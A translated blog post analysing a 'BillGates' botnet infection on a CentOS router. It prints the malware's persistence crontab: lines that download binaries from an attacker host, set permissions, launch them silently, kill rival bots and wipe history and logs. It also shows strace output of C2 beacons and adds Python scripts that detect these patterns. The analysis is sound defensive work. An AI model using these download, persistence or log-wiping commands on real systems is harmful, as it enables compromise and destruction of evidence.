The "BillGates" botnet malware on Linux

I thought the analysis was very good, so I decided to translate it; I hope to exchange ideas with everyone O(∩_∩)O~

Please credit the source when reposting: http://blog.csdn.net/u010484477     O(∩_∩)O Thanks

Keywords: virus, linux, information security

In the log I wrote yesterday I mentioned that my home router (x86, running CentOS) was behaving strangely on its own, as if something were loading the processor by itself. So I decided to climb in and see what was going on there, and I immediately realised that someone had gotten onto the server and there were processes hanging around for dgnfd564sdf.com, mainly the following: atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd, xfsdxd and so on.

root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

Startup analysis:

At first I fumbled around trying to find out what exactly had compromised my machine this badly. The first thing I thought of was checking /etc/rc.local. It contained the following:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd

Hmm, I thought, let me take root's crontab next. It looked like this:

# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
…
*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
…
*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
…
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
…
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
…
…
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.

Oh. It is 183 KB, 4036 lines. Have you ever seen a 183 KB crontab? Well, that is what I was looking at.
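The crontab above is the whole persistence and anti-forensics story in one file: killing rival processes, re-downloading the binaries, chmod 7777, truncating logs and wiping shell history, all on one-minute or bogus "*/99" schedules. As an added example (not part of the original post or the malware), here is a small Python triage script that parses crontab text and labels exactly those patterns, and counts how often the stock comment header repeats (which is what inflates the file to 183 KB). The sample crontab is constructed from a few of the entries above plus one benign certbot line; the rule names and regexes are my own.

```python
import re
from collections import Counter

# Constructed sample: entries modelled on the recovered crontab above,
# the repeated stock header trimmed to two copies, plus one benign job.
SAMPLE_CRONTAB = """\
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
*/1 * * * * killall -9 nfsd4
*/99 * * * * killall -9 kysapd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * chmod 7777 /etc/atdd
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * cd /var/log > secure
*/1 * * * * history -c
0 3 * * * /usr/bin/certbot renew --quiet
"""

# (label, regex tested against the command part of each entry).
# Note on "log-truncation": `cd /var/log > secure` does NOT truncate
# /var/log/secure; the shell opens the redirection target in the current
# directory (root's home for root's cron) before the builtin cd runs, so
# these lines litter the home directory with empty files instead. The
# logs under /var/log are therefore still worth reading.
RULES = [
    ("kills-processes", re.compile(r"\bkillall\b|\bpkill\b")),
    ("remote-download", re.compile(r"\b(wget|curl)\b.*https?://")),
    ("setuid-chmod", re.compile(r"\bchmod\s+[4-7]\d{3}\b|\bchmod\s+[ugo]*\+[rwx]*s")),
    ("log-truncation", re.compile(r"cd\s+/var/log\s*>|>\s*/var/log/")),
    ("history-wipe", re.compile(r"\.bash_history|\bhistory\s+-[cr]\b")),
    ("profile-tamper", re.compile(r">>\s*/etc/profile\b")),
    ("silent-launcher", re.compile(r"\bnohup\b.*>\s*/dev/null")),
]

# five schedule fields followed by the command
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


def parse_crontab(text):
    """Yield ((min, hour, dom, mon, dow), command) for each job line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield tuple(m.groups()[:5]), m.group(6)


def minute_step_out_of_range(minute_field):
    """True for steps like */99 or */120: larger than the 0-59 range.
    Vixie-derived crons do not read this as 'every N minutes'; the step
    only ever matches minute 0, so such jobs fire hourly."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return bool(m) and int(m.group(1)) > 59


def triage_crontab(text):
    """Return [(schedule, command, [labels])] for entries that match a rule."""
    findings = []
    for sched, cmd in parse_crontab(text):
        labels = [name for name, rx in RULES if rx.search(cmd)]
        if minute_step_out_of_range(sched[0]):
            labels.append("bogus-minute-step")
        if labels:
            findings.append((" ".join(sched), cmd, labels))
    return findings


def header_bloat(text):
    """Comment lines that occur more than once, with their counts; a stock
    header appended on every reinfection shows up as huge numbers here."""
    counts = Counter(l.strip() for l in text.splitlines() if l.strip().startswith("#"))
    return {line: n for line, n in counts.items() if n > 1}


if __name__ == "__main__":
    for sched, cmd, labels in triage_crontab(SAMPLE_CRONTAB):
        print(f"{sched:18} {', '.join(labels):35} {cmd}")
    print("repeated header lines:", header_bloat(SAMPLE_CRONTAB))
```

Run it against `crontab -l -u root` output (and the files under /etc/cron.d, /var/spool/cron) on a suspect host; anything labelled is worth a look, and the combination of "kills-processes" with "remote-download" and "silent-launcher" in one crontab is the signature of this family rather than of an admin's scheduled job.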

By the time I got onto the server, these processes were no longer doing anything (no CPU, no network). They had evidently decided to stop running and resume their business later, so that these telltale signs would not persist and get them noticed. Their strace looked like this:

[root@<host> etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 

[root@<host> etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached
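The two traces show the bot's check-in loop: a non-blocking connect() to port 10991, a 401-byte hello that carries the kernel version string in cleartext, a 15-second nanosleep, repeat. The first host refuses the connection; the second accepts it and the two sides start exchanging 4-byte and 27-byte frames. As an added example (not from the original post), the Python snippet below parses strace output of that shape and reduces it to what a responder wants: the C2 candidates, the beacon interval, whether a hello was accepted, and what the hello leaked. The sample lines are copied from the traces above; the regexes assume strace's default output format and the dictionary keys are my own names.

```python
import re
from collections import Counter

# Sample input: lines copied from the two strace sessions above
# (one refused connection, one accepted one).
SAMPLE_TRACE = r'''
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
recv(3, "\4\0\0\0", 4, 0)               = 4
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
recv(3, "\4\0\0\0", 4, 0)               = 4
nanosleep({15, 0}, NULL)                = 0
'''

CONNECT_RE = re.compile(
    r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
    r'sin_addr=inet_addr\("([\d.]+)"\)\}, \d+\)')
# strace prints the buffer as a C string literal, "..." marks truncation
SEND_RE = re.compile(r'send\(\d+, "((?:\\.|[^"\\])*)"(?:\.\.\.)?, (\d+), \d+\)\s*=\s*(-?\d+)')
RECV_RE = re.compile(r'recv\(\d+, "((?:\\.|[^"\\])*)", (\d+), \d+\)\s*=\s*(-?\d+)')
SLEEP_RE = re.compile(r'nanosleep\(\{(\d+), (\d+)\}')
BANNER_RE = re.compile(r'Linux \d[\w.\-]*')   # the uname string inside the hello


def summarize_strace(text):
    """Summarise C2 behaviour from strace text: peers, cadence, outcome."""
    targets = Counter()       # (ip, port) -> connect() attempts
    refused = 0               # sends that failed (peer down or refusing)
    banners = set()           # host fingerprint leaked in the hello
    sleeps = []               # nanosleep durations in seconds
    exchange = []             # ("out"/"in", bytes) after an accepted hello
    hello_accepted = False
    for line in text.splitlines():
        m = CONNECT_RE.search(line)
        if m:
            targets[(m.group(2), int(m.group(1)))] += 1
            continue
        m = SEND_RE.search(line)
        if m:
            payload, sent = m.group(1), int(m.group(3))
            b = BANNER_RE.search(payload)
            if b:
                banners.add(b.group(0))
            if sent < 0:
                refused += 1
            else:
                hello_accepted = True
                exchange.append(("out", sent))
            continue
        m = RECV_RE.search(line)
        if m and hello_accepted:
            exchange.append(("in", int(m.group(3))))
            continue
        m = SLEEP_RE.search(line)
        if m:
            sleeps.append(int(m.group(1)) + int(m.group(2)) / 1e9)
    return {
        "targets": dict(targets),
        "refused_sends": refused,
        "hello_accepted": hello_accepted,
        "leaked_banners": sorted(banners),
        "beacon_interval_s": min(sleeps) if sleeps else None,
        "exchange": exchange,
    }


if __name__ == "__main__":
    for key, value in summarize_strace(SAMPLE_TRACE).items():
        print(f"{key:18} {value}")
```

The useful output for detection is the combination: a fixed destination port, a fixed-size first client message with a plaintext "Linux ..." string near its start, and a retry every 15 seconds regardless of the result. That cadence is easy to spot in flow data from the host, and it is why the author could see the bot at all even while it was otherwise idle.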

Throughout this the processes appear to do almost nothing, only occasional data collection. Of course, they also touched /etc/rc.local, crontab and the executables (all of which have the SUID bit set, which lets them do whatever they like; but why did it neither delete nor change them?), and in /etc/profile they only added:

unset MAILCHECK

That means the botnet had been on the machine for roughly 7 hours. It may actually have been somewhat less, but not by much.

Now I had to check whether any system files had been modified. On CentOS it is enough to run:

rpm -Va

I was pleased that the command output exactly what I expected:

[root@<host> ~]# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
.M.......    /usr/share/cacti/images/graph_page_top.gif
.M.......    /usr/share/cacti/images/graph_properties.gif
.M.......    /usr/share/cacti/images/graph_query.png
.M.......    /usr/share/cacti/images/graph_zoom.gif
.M.......    /usr/share/cacti/images/hide.gif
.M.......    /usr/share/cacti/images/install_icon.png
.M.......    /usr/share/cacti/images/install_icon_disabled.png
.M.......    /usr/share/cacti/images/left_border.gif
.M.......    /usr/share/cacti/images/menu_line.gif
.M.......    /usr/share/cacti/images/menuarrow.gif
.M.......    /usr/share/cacti/images/move_down.gif
.M.......    /usr/share/cacti/images/move_left.gif
.M.......    /usr/share/cacti/images/move_right.gif
.M.......    /usr/share/cacti/images/move_up.gif
.M.......    /usr/share/cacti/images/reload_icon_small.gif
.M.......    /usr/share/cacti/images/shadow.gif
.M.......    /usr/share/cacti/images/shadow_gray.gif
.M.......    /usr/share/cacti/images/show.gif
.M.......    /usr/share/cacti/images/tab_cacti.gif
.M.......    /usr/share/cacti/images/tab_console.gif
.M.......    /usr/share/cacti/images/tab_console_down.gif
.M.......    /usr/share/cacti/images/tab_graphs.gif
.M.......    /usr/share/cacti/images/tab_graphs_down.gif
.M.......    /usr/share/cacti/images/tab_mode_list.gif
.M.......    /usr/share/cacti/images/tab_mode_list_down.gif
.M.......    /usr/share/cacti/images/tab_mode_preview.gif
.M.......    /usr/share/cacti/images/tab_mode_preview_down.gif
.M.......    /usr/share/cacti/images/tab_mode_tree.gif
.M.......    /usr/share/cacti/images/tab_mode_tree_down.gif
.M.......    /usr/share/cacti/images/tab_settings.gif
.M.......    /usr/share/cacti/images/tab_settings_down.gif
.M.......    /usr/share/cacti/images/transparent_line.gif
.M.......    /usr/share/cacti/images/uninstall_icon.gif
.M.......    /usr/share/cacti/images/view_none.gif
.M.......    /usr/share/cacti/include
.M.......    /usr/share/cacti/include/auth.php
.M.......    /usr/share/cacti/include/bottom_footer.php
.M.......    /usr/share/cacti/include/global.php
.M.......    /usr/share/cacti/include/global_arrays.php
.M.......    /usr/share/cacti/include/global_constants.php
.M.......    /usr/share/cacti/include/global_form.php
.M.......    /usr/share/cacti/include/global_settings.php
.M.......    /usr/share/cacti/include/jscalendar
.M.......    /usr/share/cacti/include/jscalendar/calendar-setup.js
.M.......    /usr/share/cacti/include/jscalendar/calendar.js
.M.......    /usr/share/cacti/include/jscalendar/lang
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-af.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-al.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-bg.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-big5-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-big5.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-br.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ca.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-cs-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-cs-win.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-da.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-de.js
